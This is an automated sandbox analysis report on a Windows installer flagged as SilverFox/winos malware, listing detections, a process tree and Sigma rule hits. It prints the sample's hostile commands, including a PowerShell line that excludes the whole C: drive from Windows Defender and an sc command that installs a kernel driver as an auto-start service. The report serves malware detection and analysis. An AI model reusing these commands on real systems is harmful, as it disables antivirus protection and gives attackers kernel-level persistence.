Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe

Overview

General Information

Sample name:#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe
renamed because original name is a hash value
Original sample name:_1.1.2.exe
Analysis ID:1580551
MD5:8af97a4879574d6e29e4e9fcd3a9bef0
SHA1:3c0fcaf35b6f6cb6eb710ccb91c691fa629430ab
SHA256:ac7a870316c9f66b5750e39592f97e58a5ae8da0f05951a5f25047b15aa88041
Tags:exeSilverFoxwinosuser-kafan_shengui
Infos:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe (PID: 3268 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe" MD5: 8AF97A4879574D6E29E4E9FCD3A9BEF0)
    • #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp (PID: 1176 cmdline: "C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp" /SL5="$20406,8071911,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe" MD5: C9B4238B2FFEC70B575E52822B8A8F70)
      • powershell.exe (PID: 516 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 6856 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe (PID: 3656 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe" /VERYSILENT MD5: 8AF97A4879574D6E29E4E9FCD3A9BEF0)
        • #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp (PID: 5228 cmdline: "C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp" /SL5="$30420,8071911,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe" /VERYSILENT MD5: C9B4238B2FFEC70B575E52822B8A8F70)
          • 7zr.exe (PID: 4884 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 6332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 6596 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 5368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Conhost.exe (PID: 2064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1828 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3300 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4052 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6272 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5612 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2224 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4952 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5748 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3540 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3380 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 432 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1804 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5236 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1780 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2852 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2728 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 64 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5076 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5308 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6772 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6324 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6400 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 320 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2324 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5072 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5028 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7032 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5020 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4952 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6284 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3540 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2020 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1548 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5236 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6492 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4060 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6540 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6332 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5664 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6932 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6772 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 972 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5256 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5960 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6224 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6244 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4832 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5988 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5580 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3560 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5692 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5360 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6524 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4836 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3976 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3516 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7128 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6628 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5664 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5612 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6368 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2324 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5256 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3224 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6224 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 404 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp" /SL5="$20406,8071911,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp, ParentProcessId: 1176, ParentProcessName: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 516, ProcessName: powershell.exe
Sigma detected: New Kernel Driver Via SC.EXE
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1828, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 3300, ProcessName: sc.exe
Sigma detected: Powershell Defender Exclusion
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp" /SL5="$20406,8071911,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp, ParentProcessId: 1176, ParentProcessName: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 516, ProcessName: powershell.exe
Sigma detected: New Service Creation Using Sc.EXE
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1828, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 3300, ProcessName: sc.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp" /SL5="$20406,8071911,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp, ParentProcessId: 1176, ParentProcessName: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 516, ProcessName: powershell.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\Windows NT\hrsw.vbcReversingLabs: Detection: 26%
Source: C:\Program Files (x86)\Windows NT\hrsw.vbcVirustotal: Detection: 37%Perma Link
Source: C:\Users\user\AppData\Local\Temp\is-08K47.tmp\update.vbcReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\is-7GK69.tmp\update.vbcReversingLabs: Detection: 26%
Multi AV Scanner detection for submitted file
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeVirustotal: Detection: 9%Perma Link
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.2164014609.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.2163901201.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpCode function: 6_2_6CB5E090 FindFirstFileA,FindClose,FindClose,6_2_6CB5E090
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00566868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,9_2_00566868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00567496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,9_2_00567496
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp, 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp, 00000006.00000002.2282777107.0000000003E89000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.dr, update.vbc.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp, 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp, 00000006.00000002.2282777107.0000000003E89000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.dr, update.vbc.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp, 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp, 00000006.00000002.2282777107.0000000003E89000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.dr, update.vbc.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp, 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp, 00000006.00000002.2282777107.0000000003E89000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.dr, update.vbc.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp, 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp, 00000006.00000002.2282777107.0000000003E89000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.dr, update.vbc.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp, 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp, 00000006.00000002.2282777107.0000000003E89000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.dr, update.vbc.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp, 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp, 00000006.00000002.2282777107.0000000003E89000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.dr, update.vbc.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
